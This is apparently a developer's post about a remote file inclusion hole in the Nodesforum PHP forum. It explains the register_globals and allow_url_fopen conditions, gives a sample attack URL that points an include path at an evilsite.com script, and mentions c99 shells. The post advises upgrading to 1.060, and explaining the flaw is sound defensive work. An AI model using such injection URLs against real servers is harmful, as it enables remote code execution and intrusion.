Anyways I must say that this bd0rk is not super friendly, of all my attempts to talk to him about the exploit and ask him for more information he only once answered me a very minimal answer confirming that he was using nodesforum 1.059 indeed. He never accepted to give me more information about how he was accomplishing the exploit or if he could confirm to me that 1.060 fixed the hole. Even though im 99.99999999% sure it does and Rob Keith from securityfocus.com confirmed that "Looking through the latest code, the exploit would fail as described." but Im not sure if he was referring to the 1.059 or the 1.060.
In case you did not know, what ppl do to accomplish this type of "remote file inclusion" is using the register_globals feature of PHP. What this feature does is transpose $_GET variables in normal variables in the execution of the script. For example if on a PHP server with register_globals on I went to the url
http://website.com/webpage?varname=varvalue this would be the same as adding
at the beginning of the script.
So the problem is if you have in a certain PHP file, like in the nodesforum, something like
code:
include($nodesforum_code_path.'/somecode.php'); |
and that the $nodesforum_code_path is not declared in this PHP file because this file is meant to be included by another file which is responsible for setting $nodesforum_code_path. Someone could use this as a door to run their own PHP scripts in your server, by going to
http://website.com/webpage?nodesforum_code_path=http://evilsite.com/evilscript.php? it ends up running
code:
include('http://evilsite.com/evilscript.php?/somecode.php'); |
Now next the server also needs to have "allow_url_fopen" enabled so that the server can be able to include() the remote (http://) script.
And if you are wondering what kind of script is the attacker going to be running on your server, take a look at this:
http://www.google.ca/search?q=c99+remote+inclusion
So in other words to be vulnerable to this kind of attack you need to run your PHP with "register_globals" enabled and "allow_url_fopen". If you are running on your own server it is highly encouraged that you do not enable "register_globals" this is mostly required by old PHP scripts that were built a long time ago. but it may be hard to not have "allow_url_fopen" enabled because it can be useful for many things. If you are using a *shared server, most chances are that all this is going to be enabled because they want to make sure everything will work for everyone. As a side note to all the attackers who have been trying themselves since the publication of this potential security hole, the nodesforum server does not have "register_globals" enabled so these attacks are useless.
The only mystery that remains with this story is that initially when I first created the nodesforum, beeing completely unaware of the existence of the "register_globals" feature, I had left this huge security hole in the forum script. It was not an issue for me because my "register_globals" was off by default (thanks Ubuntu!), but someone pointed it out and I made a fix in the version 1.046 of the forum. I still look at my 1.046 fix today and it looks good to me, I cannot see how the remote inclusion attack could succeed with this security but this person bd0rk claims that he can perform the file inclusion attack on 1.059. And reconfirmed.
So anyways I decided to not take any chance and I toughed of a new security that could protect against this, I added the new security to the old one to put all the chances on my side. If you are using the Nodesforum on a shared server, I highly recommend that you
upgrade to Nodesforum 1.060 or higher to protect yourself against this kind of attack.